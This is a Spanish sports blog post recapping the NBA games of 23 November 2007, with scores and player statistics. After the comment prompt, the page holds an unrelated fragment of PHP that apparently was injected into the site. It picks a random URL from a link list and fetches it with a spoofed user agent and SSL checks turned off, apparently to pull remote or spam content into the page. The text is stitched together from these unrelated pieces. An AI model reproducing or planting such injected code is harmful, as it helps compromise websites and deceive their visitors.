La crónica (23/11/07)

24 de November de 2007 por xapa_croack

barontripledoubleCrónica de la pasada madrugada en la NBA:

Golden State 123 – 115 Washington

Avisábamos de que prometían espectáculo. Y ofrecieron uno del bueno. Warriors y Wizards volvieron a protagonizar un duelo de altísima anotación que tuvo dos protagonistas, uno por bando. Baron Davis y Caron Butler firmaron sendos triple-doble, aunque fue el base californiano quien se llevó la victoria en gran parte por sus canastas decisivas. 33 puntos, 15 asistencias y 11 rebotes logró Davis, por 26-10-11 de Butler. Jamison añadió 30-12, pero además de Davis, otros seis warriors anotaron en dobles figuras, incluyeno 28 de Stephen Jackson.

 

Charlotte 92 – 105 Orlando

 

Dwight Howard volvió a dar motivos para ser considerado como el interior que dominará en un futuro que empieza a parecerse al presente. 11 de 14 en tiros de campo para 34 puntos, más 17 rebotes, 4 tapones y 3 robos logró Howard, que lideró a un equipo completo en el que todos los titulares y el sexto, Dooling, lograron más de 11 puntos. En los Bobcat, Okafor firmó 12 puntos y 18 rebotes.

 

LA Lakers 94 – 107 Celtics

Escasa oposición pusieron los Lakers a unos Celtics que rápidamente abrieron brecha en el marcador. No se puede decir que el partido no siguiese un guión previsible salvo por un detalle: el jugador más desequilibrante de los Celtics no fue Garnett, ni Allen ni Pierce, sino Perkins, autor de 21 puntos con 8 de 10 en tiros de campo y 9 rebotes. Los Lakers no entraron en el ritmo del partido hasta la segunda mitad, pese a que no pudieron más que salvar un marcador digno y en ningún momento dieron la impresión de poder remontar. El desastroso partido de Odom y los problemas de faltas de Bynum lastraron mucho a los californianos, que encajan su segunda derrota seguida. Los Celtics, a la suya: 10-1.

Houston 91 – 98 Miami

El duelo de parejas estelares cayó del lado de los Heat. Y eso que McGrady y Yao contaron con la aportación de un tercer jugador, Scola, que fue el mejor rocket con 20 puntos, 10 de 16 en tiros, 9 rebotes y 3 asistencias. Pero el despertar definitivo de Shaq, que hizo 10 de 12 en tiros, 26 puntos, 14 rebotes y 3 tapones, llevó en volandas a los Heat. Wade logró 31 puntos y 5 asistencias en la que supone la tercera victoria de los de Florida.

Philadelphia 78 – 83 Detroit

El clásico del Este, entre dos de las franquicias que batallaron contra los Celtics por el trono de la conferencia durante los ’80, cayó del lado del gran favorito. El partido fue gris e igualado en su primera mitad. En el tercer cuarto, los Pistons se pusieron por encima echando mano de su defensa y sin contar con grandes actuaciones ofensivas por parte de ninguno de sus jugadores. McDyess, Prince y Maxiell, titular por la ausencia de Rasheed, fueron los más efectivos, mientras que en los Sixers, Iguodala tuvo un mal día en tiros, 4 de 17, pero aportó 7 rebotes y 6 asistencias.

Dallas 107 – 111 Indiana

Sin Jermaine, los Pacers funcionaron a la perfección con un quinteto muy sólido (Tinsley, Granger, Dunleavy, Murphy y Foster) más un sexto como Shwame Williams que añadió 10 puntos en 18 minutos. Los Mavericks remontaron los 16 puntos de desventaja que arrastraban en la primera mitad y llegaron a empatar a menos de 6 minutos para el final, pero fueron incapaces de lanzar en la jugada decisiva cuando Foster recuperó un balón que iba dirigido a Nowitzki. El alemán logró 20-11-5, pero el máximo anotador de los texanos fue Harris, con 24 (13 de ellos de tiro libre).

Memphis 88 – 101 San Antonio

Juan Carlos Navarro no ha necesitado muchas oportunidades para demostrar que puede ser titular en los Grizzlies. El internacional español salió de inicio, jugó casi 35 minutos (el que más de su equipo) y logró 16 puntos, 4 rebotes y 4 asistencias con 7 de 12 en tiros. San Antonio pasó por encima de los Grizzlies igualmente, con la pareja Parker-Duncan a pleno rendimiento (49 puntos con 22 de 32 en tiros, más 14 rebotes y 10 asistencias entre ambos). Gasol, Miller y Gay anotaron entre 12 y 15 puntos pero el preocupante momento de Stoudamire (1 de 8 en tiros, 0 de 5 en triples) y el dominio reboteador al que fueron sometidos fueron demasiado para los Grizzlies.

Minnesota 93 -99 Denver

 

Los Nuggets consiguen su séptima victoria en los últimos ocho partidos (sólo tropezaron frente a los Clippers). Kenyon Martin olvidó su partido pasado de 0 puntos (0/5) en tiros, y en éste hizo el record personal de la temporada con 18 puntos, aunque Melo se erigió el mejor del partido con 31 puntos, en la faceta reboteadora destacó nuevamente Marcus Camby con 18 rebotes y 10 puntos, Allen Iverson estuvo fatal tirando 2/12 pero supo repartir algo de juego gracias a sus 10 asistencias. Mientras tanto los jóvenes visitantes perdieron una renta de 3 puntos cuando faltaban 3 minutos, pero los Nuggets hicieron un 0-10 y se llevaron el partido, Walker desde el banquillo con 24 tantos y Ryan Gomes con 18, fueron los mejores de los Wolves. El 1 de 15 de McCants mermó mucho las posibilidades de Minessota, y continúan siendo el peor equipo de la liga.

 

 

New Orleans 71 – 99 Utah
Todo el mundo se fijaba en los dos mejores bases jóvenes talentosos del draft del 2005 Paul y Deron para conducir a sus equipos a la victoria, pero los protagonistas fueron los bases reservas de Utah, Ronnie Price y Jason Hart. El primero anoto 12 puntos mientras Hart con 11 domino a los Hornets. Mientras Carlos Bozzer aporto 19 puntos y 16 rebotes para que los Jazz consiguieran su sexta victoria consecutiva en casa. El mejor de visitantes fue David West con 18 puntos y 14 rebotes, Chandler se quedó en 12 puntos y 7 rebotes. En el duelo de bases Paul le ganó la partida con 15 puntos 6 asistencias y 6 rebotes a Deron Williams, algo tocado, con 12 puntos 7 asistencias y 3 rebotes

 

 

Clippers 94 -113 Phoenix
Los Suns golpearon con fuerza a los Clippers con Amare y Marion como puntales. El primero metió 29 puntos, 13 de ellos en el tercer cuarto en el que se marcho en el marcador definitivamente, mientras Matrix aporto 21 puntos 17 rebotes 5 robos y 2 tapones. De esta manera los Suns se colocan con un 11-2 e igualan el record de la temporada 2005, podrán superar el record si el lunes ganan a GSW. Nash hizo un 20-10, y el gran Hill otros 19 tantos. En el partido del run&gun, el veterano de 38 años Cassell fue el mejor angelino con 26 puntos, Kaman continua en su línea All star con 17 puntos 14 rebotes 4 asistencias y 4 tapones. El peleón Patterson desde el banco contribuyó gratamente con 18 puntos y 11 rebotes. Con las bajas de Brand, Livingston, Maggette, Knight poco se puede hacer ante uno de los mejores conjuntos de la liga.

 

 

Sacramento 84- 87 Portland
Los Trail Blazers rompieron una racha de 5 derrotas seguidas, remontando en los últimos 25 segundos. Perdían 84-83 pero metieron los últimos 4 puntos del partido y volvieron a ganar como locales. Aldridge con 28 puntos 12 rebotes y 3 tapones se alzó con el MVP del partido, Brandon Roy con 13 puntos 8 asistencias y 3 robos, fue decisivo ya que metió una de las jugadas importantes del final. Steve Blake metió sus 13 puntos en la segunda parte. Por parte californiana Kevin Martin volvió a ser el mejor con 21 puntos 7 rebotes, Artest hizo buen partido con 17 puntos y 11 rebotes, pero no fue suficiente. En el banco el dominicano García hizo 17 puntos, y la vuelta del adriático Beno Udrih después de su lesión no gratificó a los Kings al quedarse en 11 puntos 6 asistencias.

 

 

 

New Jersey 98 – 93 Seattle
Richard Jefferson continuó con un estelar inicio de temporada, aportando 30 puntos para darle la victoria a su equipo. Vicente Carter desde el banco aportó otros 15 (debería de ser titular ya en el próximo envite). En un final reñido donde los de Seattle tuvieron la oportunidad de empatar el partido (a falta de 6 segundos perdían por 3), West falló 2 tiros libres decisivos, el último intencionado, y Jefferson asguró el rebote y el triunfo. Los Sonics siguen sin regalar ningún triunfo a su afición en casa (0-5). El mejor de los Sonics fue el suplente Delonte West, pidiendo a gritos ser titular en lugar de Earl Watson, con 17 puntos y el novato Jeff Green aportó un doble-doble con 14 puntos y otros tantos rebotes. El 2 del draft, Durant se quedó con 12 puntos y 5 rebotes.

Esta entrada no tiene comentarios... pero tú puedes ser el primero.

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>